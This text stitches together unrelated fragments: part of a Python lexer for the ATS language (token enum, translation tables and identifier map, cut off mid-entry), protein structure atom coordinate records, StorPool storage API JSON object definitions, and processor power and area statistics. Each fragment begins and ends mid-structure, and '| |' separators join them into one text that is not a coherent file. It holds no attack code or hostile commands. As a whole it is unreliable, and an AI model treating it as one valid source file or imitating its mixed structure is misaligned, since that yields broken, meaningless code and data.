    T_INTZERO = "T_INTZERO"
    T_LAM = "T_LAM"
    T_LBRACE = "T_LBRACE"
    T_LBRACKET = "T_LBRACKET"
    T_LET = "T_LET"
    T_LOCAL = "T_LOCAL"
    T_LPAREN = "T_LPAREN"
    T_LT_OR_IDENT = "T_LT_OR_IDENT"  # Renamed
    T_MACDEF = "T_MACDEF"
    T_MINUSGT_OR_SIDENT = "T_MINUSGT_OR_SIDENT"  # Renamed
    T_MINUSLTGT = "T_MINUSLTGT"
    T_MINUSLT = "T_MINUSLT"
    T_NONFIX = "T_NONFIX"
    T_OF = "T_OF"
    T_OP = "T_OP"
    T_OVERLOAD = "T_OVERLOAD"
    T_PERCENTLPAREN = "T_PERCENTLPAREN"
    T_PERCENT_OR_IDENT = "T_PERCENT_OR_IDENT"  # Renamed
    T_QMARK_OR_IDENT = "T_QMARK_OR_IDENT"  # Renamed
    T_QUOTELBRACE = "T_QUOTELBRACE"
    T_QUOTELBRACKET = "T_QUOTELBRACKET"
    T_QUOTELPAREN = "T_QUOTELPAREN"
    T_RBRACE = "T_RBRACE"
    T_RBRACKET = "T_RBRACKET"
    T_REASSUME = "T_REASSUME"
    T_REC = "T_REC"
    T_RPAREN = "T_RPAREN"
    T_SCASE = "T_SCASE"
    T_SEMICOLON = "T_SEMICOLON"
    T_SIF = "T_SIF"
    T_SORTDEF = "T_SORTDEF"
    T_SPACE = "T_SPACE"
    T_SRPASSERT = "T_SRPASSERT"
    T_SRPCODEGEN2 = "T_SRPCODEGEN2"
    T_SRPDEFINE = "T_SRPDEFINE"
    T_SRPDYNLOAD = "T_SRPDYNLOAD"
    T_SRPELIFDEF = "T_SRPELIFDEF"
    T_SRPELIFNDEF = "T_SRPELIFNDEF"
    T_SRPELIF = "T_SRPELIF"
    T_SRPELSE = "T_SRPELSE"
    T_SRPENDIF = "T_SRPENDIF"
    T_SRPERROR = "T_SRPERROR"
    T_SRPIFDEF = "T_SRPIFDEF"
    T_SRPIFNDEF = "T_SRPIFNDEF"
    T_SRPIF = "T_SRPIF"
    T_SRPINCLUDE = "T_SRPINCLUDE"
    T_SRPPRAGMA = "T_SRPPRAGMA"
    T_SRPPRERR = "T_SRPPRERR"
    T_SRPPRINT = "T_SRPPRINT"
    T_SRPREQUIRE = "T_SRPREQUIRE"
    T_SRPSTALOAD = "T_SRPSTALOAD"
    T_SRPTHEN = "T_SRPTHEN"
    T_SRPUNDEF = "T_SRPUNDEF"
    T_STACST = "T_STACST"
    T_STADEF = "T_STADEF"
    T_STATIC = "T_STATIC"
    T_STRING = "T_STRING"
    T_SYMELIM = "T_SYMELIM"
    T_SYMINTR = "T_SYMINTR"
    T_THEN = "T_THEN"
    T_TILDE_OR_IDENT = "T_TILDE_OR_IDENT"  # Renamed
    T_TKINDEF = "T_TKINDEF"
    T_TRY = "T_TRY"
    T_TYPEDEF = "T_TYPEDEF"
    T_TYPE = "T_TYPE"
    T_TYPE_OR_IDENT = "T_TYPE_OR_IDENT"  # Added
    T_VAL = "T_VAL"
    T_VAR = "T_VAR"
    T_VIEWAT = "T_VIEWAT"
    T_WHEN = "T_WHEN"
    T_WHERE = "T_WHERE"
    T_WHILESTAR = "T_WHILESTAR"
    T_WHILE = "T_WHILE"
    T_WITH = "T_WITH"
    T_WITHTYPE = "T_WITHTYPE"
# Translation of non‑finals to finals
# ----------------------------------------------------------------------------
# Maps every non-final lexical product to the final product it collapses to.
NONFINS_TRANSL = {
    NonFin.ABSPROP: Fin.T_ABSTYPE,
    NonFin.ABST0YPE: Fin.T_ABSTYPE,
    NonFin.ABSTYPE: Fin.T_ABSTYPE,
    NonFin.ABSVIEWT0YPE: Fin.T_ABSTYPE,
    NonFin.ABSVIEW: Fin.T_ABSTYPE,
    NonFin.ABSVIEWTYPE: Fin.T_ABSTYPE,
    NonFin.CASE_neg: Fin.T_CASE,
    NonFin.CASE_pos: Fin.T_CASE,
    NonFin.CASE: Fin.T_CASE,
    NonFin.CASTFN: Fin.T_FUN,
    NonFin.COMMENT_block_c: Fin.T_COMMENT_block,
    NonFin.COMMENT_block_ml: Fin.T_COMMENT_block,
    NonFin.DATAPROP: Fin.T_DATATYPE,
    NonFin.DATATYPE: Fin.T_DATATYPE,
    NonFin.DATAVIEW: Fin.T_DATATYPE,
    NonFin.DATAVTYPE: Fin.T_DATATYPE,
    NonFin.DLRDELAY: Fin.T_DLRDELAY,
    NonFin.DLREFFMASK_ALL: Fin.T_DLREFFMASK_ARG,
    NonFin.DLREFFMASK_EXN: Fin.T_DLREFFMASK_ARG,
    NonFin.DLREFFMASK_NTM: Fin.T_DLREFFMASK_ARG,
    NonFin.DLREFFMASK_REF: Fin.T_DLREFFMASK_ARG,
    NonFin.DLREFFMASK_WRT: Fin.T_DLREFFMASK_ARG,
    NonFin.DLRLDELAY: Fin.T_DLRDELAY,
    NonFin.DLRLST: Fin.T_DLRLST,
    NonFin.DLRLST_T: Fin.T_DLRLST,
    NonFin.DLRLST_VT: Fin.T_DLRLST,
    NonFin.DLRREC: Fin.T_DLRREC,
    NonFin.DLRREC_T: Fin.T_DLRREC,
    NonFin.DLRREC_VT: Fin.T_DLRREC,
    NonFin.DLRTUP: Fin.T_DLRTUP,
    NonFin.DLRTUP_T: Fin.T_DLRTUP,
    NonFin.DLRTUP_VT: Fin.T_DLRTUP,
    NonFin.DLRVCOPYENV_V: Fin.T_DLRVCOPYENV,
    NonFin.DLRVCOPYENV_VT: Fin.T_DLRVCOPYENV,
    NonFin.FIXAT: Fin.T_FIX,
    NonFin.FIX: Fin.T_FIX,
    NonFin.FN: Fin.T_FUN,
    NonFin.FNX: Fin.T_FUN,
    NonFin.FUN: Fin.T_FUN,
    NonFin.IMPLEMENT: Fin.T_IMPLEMENT,
    NonFin.IMPLMNT: Fin.T_IMPLEMENT,
    NonFin.INFIXL: Fin.T_FIXITY,
    NonFin.INFIXR: Fin.T_FIXITY,
    NonFin.INFIX: Fin.T_FIXITY,
    NonFin.LAMAT: Fin.T_LAM,
    NonFin.LAM: Fin.T_LAM,
    NonFin.LLAMAT: Fin.T_LAM,
    NonFin.LLAM: Fin.T_LAM,
    NonFin.MACDEF: Fin.T_MACDEF,
    NonFin.MACRODEF: Fin.T_MACDEF,
    NonFin.POSTFIX: Fin.T_FIXITY,
    NonFin.PRAXI: Fin.T_FUN,
    NonFin.PREFIX: Fin.T_FIXITY,
    NonFin.PRFN: Fin.T_FUN,
    NonFin.PRFUN: Fin.T_FUN,
    NonFin.PRIMPLMNT: Fin.T_IMPLEMENT,
    NonFin.PROPDEF: Fin.T_TYPEDEF,
    NonFin.PROP_neg: Fin.T_TYPE,
    NonFin.PROP_pos: Fin.T_TYPE,
    NonFin.PROP: Fin.T_TYPE_OR_IDENT,
    NonFin.PRVAL: Fin.T_VAL,
    NonFin.PRVAR: Fin.T_VAR,
    NonFin.T0YPE_neg: Fin.T_TYPE,
    NonFin.T0YPE_pos: Fin.T_TYPE,
    NonFin.T0YPE: Fin.T_TYPE,
    NonFin.TYPEDEF: Fin.T_TYPEDEF,
    NonFin.TYPE_neg: Fin.T_TYPE,
    NonFin.TYPE_pos: Fin.T_TYPE,
    NonFin.TYPE: Fin.T_TYPE_OR_IDENT,
    NonFin.VAL_neg: Fin.T_VAL,
    NonFin.VAL_pos: Fin.T_VAL,
    NonFin.VAL: Fin.T_VAL,
    NonFin.VAR: Fin.T_VAR,
    NonFin.VIEWDEF: Fin.T_TYPEDEF,
    NonFin.VIEW_neg: Fin.T_TYPE,
    NonFin.VIEW_pos: Fin.T_TYPE,
    NonFin.VIEWT0YPE_neg: Fin.T_TYPE,
    NonFin.VIEWT0YPE_pos: Fin.T_TYPE,
    NonFin.VIEWT0YPE: Fin.T_TYPE,
    NonFin.VIEW: Fin.T_TYPE_OR_IDENT,
    NonFin.VIEWTYPEDEF: Fin.T_TYPEDEF,
    NonFin.VIEWTYPE_neg: Fin.T_TYPE,
    NonFin.VIEWTYPE_pos: Fin.T_TYPE,
    NonFin.VIEWTYPE: Fin.T_TYPE_OR_IDENT,
    NonFin.WITHPROP: Fin.T_WITHTYPE,
    NonFin.WITHTYPE: Fin.T_WITHTYPE,
    NonFin.WITHVIEW: Fin.T_WITHTYPE,
    NonFin.WITHVIEWTYPE: Fin.T_WITHTYPE}
# Sanity checks: the mapping is total over NonFin and targets only Fin.
assert all(isinstance(x, NonFin) for x in NONFINS_TRANSL)
assert all(isinstance(x, Fin) for x in NONFINS_TRANSL.values())
assert all(x in NONFINS_TRANSL for x in NonFin)
# Translation of some idents to products
# ----------------------------------------------------------------------------
IDENTS_TRANSL = {
# Finals
"and": Fin.T_AND,
"as": Fin.T_AS,
"assume": Fin.T_ASSUME,
"absimpl": Fin.T_ASSUME,
"@": Fin.T_AT_OR_SIDENT,
"!": Fin.T_BANG_OR_IDENT,
"|": Fin.T_BAR,
"begin": Fin.T_BEGIN,
"`": Fin.T_BQUOTE,
"classdec": Fin.T_CLASSDEC,
":": Fin.T_COLON,
"datasort": Fin.T_DATASORT,
"$arrpsz": Fin.T_DLRARRPSZ,
"$arrptrsize": Fin.T_DLRARRPSZ,
"$break": Fin.T_DLRBREAK,
"$continue": Fin.T_DLRCONTINUE,
"$d2ctype": Fin.T_DLRD2CTYPE,
"$effmask": Fin.T_DLREFFMASK,
"$extern": Fin.T_DLREXTERN,
"$extfcall": Fin.T_DLREXTFCALL,
"$extkind": Fin.T_DLREXTKIND,
"$extmcall": Fin.T_DLREXTMCALL,
"$extval": Fin.T_DLREXTVAL,
"$extype": Fin.T_DLREXTYPE,
"$extype_struct": Fin.T_DLREXTYPE_STRUCT,
"$literal": Fin.T_DLRLITERAL,
"$myfilename": Fin.T_DLRMYFILENAME,
"$myfunction": Fin.T_DLRMYFUNCTION,
"$mylocation": Fin.T_DLRMYLOCATION,
"$raise": Fin.T_DLRRAISE,
"$showtype": Fin.T_DLRSHOWTYPE,
"$solver_assert": Fin.T_DLRSOLASSERT,
"$solver_verify": Fin.T_DLRSOLVERIFY,
"$tempenver": Fin.T_DLRTEMPENVER,
"$tyrep": Fin.T_DLRTYREP,
"$vararg": Fin.T_DLRVARARG,
"do": Fin.T_DO,
"$": Fin.T_DOLLAR,
".": Fin.T_DOT,
"..": Fin.T_DOTDOT,
"...": Fin.T_DOTDOTDOT,
".<>.": Fin.T_DOTLTGTDOT,
".<": Fin.T_DOTLT,
"else": Fin.T_ELSE,
"end": Fin.T_END,
"=": Fin.T_EQ_OR_DIDENT,
"=>": Fin.T_EQGT,
"=>>": | |
ASN B 1 131 ? 65.744 -30.604 10.789 1.00 18.90 ? 132 ASN B ND2 1
ATOM 2747 N N . THR B 1 132 ? 66.400 -31.556 16.308 1.00 14.98 ? 133 THR B N 1
ATOM 2748 C CA . THR B 1 132 ? 67.036 -32.170 17.433 1.00 15.50 ? 133 THR B CA 1
ATOM 2749 C C . THR B 1 132 ? 66.060 -32.948 18.255 1.00 15.02 ? 133 THR B C 1
ATOM 2750 O O . THR B 1 132 ? 66.352 -34.069 18.724 1.00 13.11 ? 133 THR B O 1
ATOM 2751 C CB . THR B 1 132 ? 67.809 -31.139 18.315 1.00 16.65 ? 133 THR B CB 1
ATOM 2752 O OG1 . THR B 1 132 ? 68.854 -30.570 17.510 1.00 16.88 ? 133 THR B OG1 1
ATOM 2753 C CG2 . THR B 1 132 ? 68.452 -31.831 19.479 1.00 17.53 ? 133 THR B CG2 1
ATOM 2754 N N . ALA B 1 133 ? 64.865 -32.365 18.401 1.00 13.18 ? 134 ALA B N 1
ATOM 2755 C CA . ALA B 1 133 ? 63.859 -32.980 19.224 1.00 12.82 ? 134 ALA B CA 1
ATOM 2756 C C . ALA B 1 133 ? 63.406 -34.275 18.552 1.00 11.29 ? 134 ALA B C 1
ATOM 2757 O O . ALA B 1 133 ? 63.280 -35.284 19.203 1.00 10.34 ? 134 ALA B O 1
ATOM 2758 C CB . ALA B 1 133 ? 62.735 -32.040 19.417 1.00 12.04 ? 134 ALA B CB 1
ATOM 2759 N N . MET B 1 134 ? 63.229 -34.257 17.239 1.00 10.81 ? 135 MET B N 1
ATOM 2760 C CA . MET B 1 134 ? 62.909 -35.481 16.528 1.00 11.16 ? 135 MET B CA 1
ATOM 2761 C C . MET B 1 134 ? 63.971 -36.590 16.716 1.00 12.72 ? 135 MET B C 1
ATOM 2762 O O . MET B 1 134 ? 63.643 -37.715 17.124 1.00 13.37 ? 135 MET B O 1
ATOM 2763 C CB . MET B 1 134 ? 62.753 -35.179 15.071 1.00 11.45 ? 135 MET B CB 1
ATOM 2764 C CG . MET B 1 134 ? 62.536 -36.499 14.260 1.00 11.17 ? 135 MET B CG 1
ATOM 2765 S SD . MET B 1 134 ? 61.116 -37.469 14.662 1.00 11.86 ? 135 MET B SD 1
ATOM 2766 C CE . MET B 1 134 ? 60.793 -38.284 13.090 1.00 11.48 ? 135 MET B CE 1
ATOM 2767 N N . ASN B 1 135 ? 65.258 -36.246 16.608 1.00 12.28 ? 136 ASN B N 1
ATOM 2768 C CA . ASN B 1 135 ? 66.247 -37.268 16.807 1.00 13.15 ? 136 ASN B CA 1
ATOM 2769 C C . ASN B 1 135 ? 66.160 -37.839 18.205 1.00 12.02 ? 136 ASN B C 1
ATOM 2770 O O . ASN B 1 135 ? 66.427 -38.980 18.453 1.00 12.71 ? 136 ASN B O 1
ATOM 2771 C CB . ASN B 1 135 ? 67.676 -36.729 16.564 1.00 12.12 ? 136 ASN B CB 1
ATOM 2772 C CG . ASN B 1 135 ? 67.983 -36.634 15.100 1.00 14.88 ? 136 ASN B CG 1
ATOM 2773 O OD1 . ASN B 1 135 ? 67.182 -37.109 14.244 1.00 15.26 ? 136 ASN B OD1 1
ATOM 2774 N ND2 . ASN B 1 135 ? 69.101 -36.019 14.776 1.00 13.93 ? 136 ASN B ND2 1
ATOM 2775 N N . LYS B 1 136 ? 65.808 -37.036 19.191 1.00 12.96 ? 137 LYS B N 1
ATOM 2776 C CA . LYS B 1 136 ? 65.688 -37.623 20.551 1.00 12.01 ? 137 LYS B CA 1
ATOM 2777 C C . LYS B 1 136 ? 64.510 -38.605 20.613 1.00 14.24 ? 137 LYS B C 1
ATOM 2778 O O . LYS B 1 136 ? 64.568 -39.605 21.318 1.00 13.74 ? 137 LYS B O 1
ATOM 2779 C CB . LYS B 1 136 ? 65.537 -36.530 21.588 1.00 12.69 ? 137 LYS B CB 1
ATOM 2780 C CG . LYS B 1 136 ? 66.783 -35.664 21.790 1.00 13.26 ? 137 LYS B CG 1
ATOM 2781 C CD . LYS B 1 136 ? 67.938 -36.464 22.320 1.00 13.66 ? 137 LYS B CD 1
ATOM 2782 C CE . LYS B 1 136 ? 69.139 -35.561 22.514 1.00 13.67 ? 137 LYS B CE 1
ATOM 2783 N NZ . LYS B 1 136 ? 70.301 -36.383 22.903 1.00 15.49 ? 137 LYS B NZ 1
ATOM 2784 N N . LEU B 1 137 ? 63.428 -38.289 19.921 1.00 11.76 ? 138 LEU B N 1
ATOM 2785 C CA . LEU B 1 137 ? 62.251 -39.176 19.873 1.00 13.66 ? 138 LEU B CA 1
ATOM 2786 C C . LEU B 1 137 ? 62.703 -40.478 19.210 1.00 14.43 ? 138 LEU B C 1
ATOM 2787 O O . LEU B 1 137 ? 62.386 -41.575 19.706 1.00 13.75 ? 138 LEU B O 1
ATOM 2788 C CB . LEU B 1 137 ? 61.107 -38.556 19.074 1.00 12.84 ? 138 LEU B CB 1
ATOM 2789 C CG . LEU B 1 137 ? 60.517 -37.237 19.618 1.00 12.72 ? 138 LEU B CG 1
ATOM 2790 C CD1 . LEU B 1 137 ? 59.399 -36.784 18.744 1.00 12.12 ? 138 LEU B CD1 1
ATOM 2791 C CD2 . LEU B 1 137 ? 60.036 -37.297 21.065 1.00 12.48 ? 138 LEU B CD2 1
ATOM 2792 N N . ILE B 1 138 ? 63.447 -40.323 18.132 1.00 14.93 ? 139 ILE B N 1
ATOM 2793 C CA . ILE B 1 138 ? 63.919 -41.484 17.375 1.00 14.82 ? 139 ILE B CA 1
ATOM 2794 C C . ILE B 1 138 ? 64.749 -42.404 18.246 1.00 16.99 ? 139 ILE B C 1
ATOM 2795 O O . ILE B 1 138 ? 64.553 -43.649 18.234 1.00 14.17 ? 139 ILE B O 1
ATOM 2796 C CB . ILE B 1 138 ? 64.688 -41.099 16.100 1.00 14.37 ? 139 ILE B CB 1
ATOM 2797 C CG1 . ILE B 1 138 ? 63.679 -40.554 15.126 1.00 12.95 ? 139 ILE B CG1 1
ATOM 2798 C CG2 . ILE B 1 138 ? 65.289 -42.328 15.449 1.00 14.07 ? 139 ILE B CG2 1
ATOM 2799 C CD1 . ILE B 1 138 ? 64.299 -39.706 14.026 1.00 13.42 ? 139 ILE B CD1 1
ATOM 2800 N N . ALA B 1 139 ? 65.731 -41.794 18.916 1.00 15.46 ? 140 ALA B N 1
ATOM 2801 C CA . ALA B 1 139 ? 66.544 -42.475 19.888 1.00 18.22 ? 140 ALA B CA 1
ATOM 2802 C C . ALA B 1 139 ? 65.711 -43.164 20.962 1.00 16.54 ? 140 ALA B C 1
ATOM 2803 O O . ALA B 1 139 ? 65.962 -44.304 21.303 1.00 15.73 ? 140 ALA B O 1
ATOM 2804 C CB . ALA B 1 139 ? 67.550 -41.498 20.537 1.00 19.01 ? 140 ALA B CB 1
ATOM 2805 N N . GLN B 1 140 ? 64.670 -42.504 21.462 1.00 17.19 ? 141 GLN B N 1
ATOM 2806 C CA . GLN B 1 140 ? 63.859 -43.087 22.557 1.00 16.44 ? 141 GLN B CA 1
ATOM 2807 C C | |
cluster generation when the disk was active on a running server. -1 since the disk is currently up.
objectsCount: The maximum amount of object that can exists on the disk.
objectsAllocated: Statistics about the amount of objects to be allocated on this disk.
storedSize: Statistics about the amount of cilent data to be stored on this disk.
onDiskSize: Statistics about the total amount of space occupied by the objects on this disk.
'''
# Union type: a disk target is either an UpDiskTarget or a DownDiskTarget.
DiskTarget = either(UpDiskTarget, DownDiskTarget)
@JsonObject(storedSize=int, objectsCount=int)
class VolumeBalancerSlot(object):
'''
storedSize: Number of bytes of client data stored on the corresponding disk set.
objectsCount: Number of objects on the corresponding disk set.
'''
@JsonObject(placeAll=PlacementGroupName, placeTail=PlacementGroupName, placeHead=PlacementGroupName, replication=VolumeReplication,
feasible=bool, blocked=bool,
size=int, storedSize=int, objectsCount=int,
root=either(VolumeNameOrGlobalId, SnapshotNameOrGlobalId), volumes=[either(VolumeNameOrGlobalId, SnapshotNameOrGlobalId)],
targetDiskSets=[[DiskId]], slots=[VolumeBalancerSlot], reuseServer=maybe(bool))
class VolumeBalancerAllocationGroup(object):
'''
root: The name of this group's root volume or snapshot
volumes: The names of all volumes and snapshots in this group.
size: The total size of all volumes and snapshots in the group.
storedSize: The total number of bytes of client data on all volumes and snapshots in this group.
objectsCount: The total number of objects of all volumes and snapshots in the group.
replication: The number of copies/replicas kept.
placeAll: The name of a placement group which describes the disks to be used for all but the last replica.
placeTail: The name of a placement group which describes the disks to be used for the last replica, the one used for reading.
placeHead: The name of a placement group which describes the disks to be used for the first replica.
feasible: Can new volumes be allocated with the current placement policy and redundancy constraints.
blocked: Can this volume be rebalanced, or is rebalancing impossible with the current placement policy due to for example missing or soft-ejecting drives.
targetDiskSets: The current sets of disks that the volume's data should be stored on.
slots: Statistics about each of the current disk sets.
reuseServer: allow placement of replicas on same server
'''
@JsonObject(remoteLocation=RemoteLocationName, remoteId=GlobalVolumeId, name=maybe(VolumeName), placeAll=maybe(PlacementGroupName), placeTail=maybe(PlacementGroupName), placeHead=maybe(PlacementGroupName), replication=maybe(VolumeReplication), template=maybe(VolumeTemplateName), export=maybe(bool), tags=maybe({VolumeTagName: VolumeTagValue}))
class SnapshotFromRemoteDesc(object):
'''
remoteLocation: The name of the remote location to fetch the snapshot from.
remoteId: The global snapshot identifier.
name: The name of the new snapshot.
placeAll: The name of a placement group which describes the disks to be used for all but the last replica.
placeTail: The name of a placement group which describes the disks to be used for the last replica, the one used for reading.
placeHead: The name of a placement group which describes the disks to be used for the first replica.
replication: The number of copies/replicas kept.
template: The name of the template that the settings of the new volume are based on.
export: Auto-export the snapshot after creating it. e.g. for backup.
tags: Arbitrary short name/value pairs stored with the snapshot.
'''
@JsonObject(remoteLocation=RemoteLocationName, remoteId=GlobalVolumeId, name=VolumeName, placeAll=maybe(PlacementGroupName), placeTail=maybe(PlacementGroupName), placeHead=maybe(PlacementGroupName), replication=maybe(VolumeReplication), template=maybe(VolumeTemplateName), export=maybe(bool), tags=maybe({VolumeTagName: VolumeTagValue}))
class VolumeFromRemoteDesc(object):
'''
remoteLocation: The name of the remote location to fetch the snapshot from.
remoteId: The global snapshot identifier.
name: The name of the new volume.
placeAll: The name of a placement group which describes the disks to be used for all but the last replica.
placeTail: The name of a placement group which describes the disks to be used for the last replica, the one used for reading.
placeHead: The name of a placement group which describes the disks to be used for the first replica.
replication: The number of copies/replicas kept.
template: The name of the template that the settings of the new volume are based on.
export: Auto-export the volume after creating it. e.g. for backup.
tags: Arbitrary short name/value pairs stored with the volume.
'''
@JsonObject(snapshot=SnapshotNameOrGlobalId, location=RemoteLocationName)
class SnapshotExportDesc(object):
'''
snapshot: The name of the snapshot.
location: The name of the remote location to grant access to.
'''
@JsonObject(snapshot=SnapshotNameOrGlobalId, location=maybe(RemoteLocationName), all=maybe(bool), force=maybe(bool))
class SnapshotUnexportDesc(object):
'''
snapshot: The name of the snapshot.
location: The name of the remote location to revoke access from.
all: Revoke access from all locations.
force: Don't check if the snapshot is still recovering in the remote location.
'''
@JsonObject(volume=VolumeNameOrGlobalId, location=RemoteLocationName, tags=maybe({VolumeTagName: VolumeTagValue}))
class VolumeBackupDesc(object):
'''
volume: The name of the volume to backup.
location: The remote location to backup to.
tags: Arbitrary short name/value pairs stored with the volume.
'''
@JsonObject(remoteId=GlobalVolumeId, snapshotGlobalId=GlobalVolumeId)
class VolumesGroupBackupSingle(object):
'''
remoteId: the globally unique id of the backup.
snapshotGlobalId: the globally unique id of the backup.
'''
@JsonObject(location=RemoteLocationName, volumes=[VolumeNameOrGlobalId], tags=maybe({VolumeTagName: VolumeTagValue}))
class VolumesGroupBackupDesc(object):
'''
volumes: The names of the volumes to backup.
location: The remote location to backup to.
tags: Arbitrary short name/value pairs stored with the volume.
'''
@JsonObject(cluster=maybe(ClusterName), clusterId=maybe(ClusterId), onAttached=maybe(OnAttached))
class VolumeMoveToRemoteDesc(object):
'''
cluster: The name of the target cluster, use this or clusterId
clusterId: The id of the target cluster, use this or cluster
onAttached: What to do if volume is attached. "fail" if not specified
'''
@JsonObject(cluster=maybe(ClusterName), clusterId=maybe(ClusterId))
class VolumeExportDesc(object):
'''
cluster: The name of the target cluster, use this or clusterId
clusterId: The id of the target cluster, use this or cluster
'''
@JsonObject(onRemoteAttached=maybe(OnAttached))
class VolumeAcquireDesc(object):
'''
onRemoteAttached: What to do if volume is attached. "fail" if not specified
'''
@JsonObject(
name=VolumeNameOrGlobalId,
location=RemoteLocationName,
creationTimestamp=longType,
size=VolumeSize,
remoteId=GlobalVolumeId,
onVolume=maybe(VolumeNameOrGlobalId),
localSnapshot=maybe(SnapshotNameOrGlobalId),
tags=maybe({VolumeTagName: VolumeTagValue}),
createdFromGlobalId=internal(GlobalVolumeId),
createdFromVisibleVolumeId=internal(longType)
)
class RemoteSnapshot(object):
'''
name: The name of the snapshot.
location: Where the snapshot is located.
creationTimestamp: The snapshot's creation timestamp (UNIX timestamp).
size: The snapshots's size in bytes.
remoteId: The global snapshot identifier.
onVolume: The name of the local volume (if any) on which the snapshot was created.
localSnapshot: The name of the local snapshot (if any) which is a copy of the remote snapshot.
tags: Arbitrary short name/value pairs stored with the snapshot.
'''
@JsonObject(id=LocationId, name=RemoteLocationName)
class RemoteLocationBase(object):
'''
id: A StorPool-provided unique location id.
name: The human-readable location name.
'''
@JsonObject(sendBufferSize=longType, recvBufferSize=longType)
class RemoteLocation(RemoteLocationBase):
'''
sendBufferSize: the size of the TCP send buffer for the location
recvBufferSize: the size of the TCP recieve buffer for the location
'''
@JsonObject(
location=RemoteLocationName,
sendBufferSize=maybe(longType),
recvBufferSize=maybe(longType)
)
class RemoteLocationUpdateDesc(object):
'''
location: The human-readable location name.
sendBufferSize: the size of the TCP send buffer for the location
recvBufferSize: the size of the TCP recieve buffer for the location
'''
@JsonObject(location=RemoteLocationName, name=RemoteLocationName)
class RemoteLocationRenameDesc(object):
'''
location: The human-readable location name.
name: The new human-readable location name.
'''
@JsonObject(id=SubClusterId, location=RemoteLocationName)
class RemoteClusterBase(object):
'''
id: A StorPool-provided unique cluster subid
location: the cluster's location name
'''
@JsonObject(name=maybe(RemoteClusterName))
class RemoteClusterAddDesc(RemoteClusterBase):
'''
name: The human-readable cluster name
'''
@JsonObject(name=RemoteClusterName)
class RemoteCluster(RemoteClusterBase):
'''
name: The human-readable cluster name
'''
@JsonObject(
name=maybe(RemoteClusterName),
location=maybe(RemoteLocationName),
id=maybe(SubClusterId),
clusterWillNotBeComingBack=maybe(bool)
)
class RemoteClusterRemoveDesc(object):
'''
name: The human-readable cluster name.
location: the cluster's location name
id: A StorPool-provided unique cluster subid
clusterWillNotBeComingBack: Set this flag if the remote cluster will not be registered again in the future. Default is false.
'''
@JsonObject(cluster=RemoteClusterName, name=RemoteClusterName)
class RemoteClusterRenameDesc(object):
'''
cluster: The human-readable cluster name.
name: The new human-readable cluster name.
'''
@JsonObject(
ip=str,
publicKey=str,
minimumDeleteDelay=maybe(longType),
noCrypto=maybe(bool)
)
class RemoteBridgeBase(object):
'''
ip: the ip address of the remote bridge
publicKey: the public key of the remote bridge
minimumDeleteDelay: minimum value for the deferred deletion
noCrypto: Set this flag if the connection with the remote bridge should not be encrypted
'''
@JsonObject(location=RemoteLocationName)
class RemoteBridgeAddLocationDesc(RemoteBridgeBase):
'''
location: the location of the remote bridge
'''
@JsonObject(remote=RemoteClusterName)
class RemoteBridgeAddClusterDesc(RemoteBridgeBase):
'''
remote: the cluster of the remote bridge
'''
RemoteBridgeAddDesc = either(
RemoteBridgeAddLocationDesc, RemoteBridgeAddClusterDesc
)
@JsonObject(ip=str)
class RemoteBridgeRemoveDesc(object):
'''
ip: the ip address of the remote bridge
'''
@JsonObject(
location=RemoteLocationName,
cluster=maybe(RemoteClusterName),
remote=either(RemoteClusterName, RemoteLocationName)
)
class RemoteBridge(RemoteBridgeBase):
'''
location: the location of the remote bridge
cluster: the cluster of the remote bridge
remote: the cluster or the location of the remote bridge
'''
@JsonObject(snapshot=SnapshotNameOrGlobalId, location=RemoteLocationName, globalId=GlobalVolumeId, backingUp=maybe(bool), volumeId=internal(longType), visibleVolumeId=internal(longType))
class Export(object):
'''
snapshot: The name of the snapshot.
location: Name of the location the snapshot is exported to
globalId: The global snapshot identifier.
backingUp: Is this a backup in making
'''
@JsonObject(location=RemoteLocationName, globalSnapshotId=GlobalVolumeId, targetDeleteDate=maybe(int), deleteAfter=maybe(int))
class SnapshotRemoteUnexportDesc(object):
'''
location: name of the location to unexport from
globalSnapshotId: the id of the snapshot to be unexported
targetDeleteDate: if not 0 instruct the remote location to delete the snapshot at the specified date. Remote side may not allow this due to configuration or the snapshot beeeing | |
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0539232,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.17736,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0861759,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.138998,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
